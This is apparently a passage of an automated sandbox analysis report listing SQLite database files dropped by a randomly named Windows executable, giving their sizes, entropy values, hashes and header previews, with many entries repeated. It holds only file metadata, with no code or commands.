                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):5242880
                                                                                                Entropy (8bit):0.037963276276857943
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5707520969659783
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):20480
                                                                                                Entropy (8bit):0.5712781801655107
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):49152
                                                                                                Entropy (8bit):0.8180424350137764
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                Category:dropped
                                                                                                Size (bytes):40960
                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                Category:dropped
                                                                                                Size (bytes):159744
                                                                                                Entropy (8bit):0.7873599747470391
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):49152
Entropy (8bit):0.8180424350137764
Encrypted:false
SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:349E6EB110E34A08924D92F6B334801D
SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:dropped
Size (bytes):28672
Entropy (8bit):2.5793180405395284
Encrypted:false
SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:41EA9A4112F057AE6BA17E2838AEAC26
SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:dropped
Size (bytes):114688
Entropy (8bit):0.9746603542602881
Encrypted:false
SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:780853CDDEAEE8DE70F28A4B255A600B
SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):106496
Entropy (8bit):1.1358696453229276
Encrypted:false
SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:28591AA4E12D1C4FC761BE7C0A468622
SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:dropped
Size (bytes):20480
Entropy (8bit):0.5712781801655107
Encrypted:false
SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:05A60B4620923FD5D53B9204391452AF
SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:dropped
Size (bytes):40960
Entropy (8bit):0.8553638852307782
Encrypted:false
SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:28222628A3465C5F0D4B28F70F97F482
SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:false
Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:dropped
Size (bytes):159744
Entropy (8bit):0.7873599747470391
Encrypted:false
SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:false
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                Category:dropped
                                                                                                Size (bytes):106496
                                                                                                Entropy (8bit):1.1358696453229276
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                Malicious:false
                                                                                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                Category:dropped
                                                                                                Size (bytes):114688
                                                                                                Entropy (8bit):0.9746603542602881
                                                                                                Encrypted:false
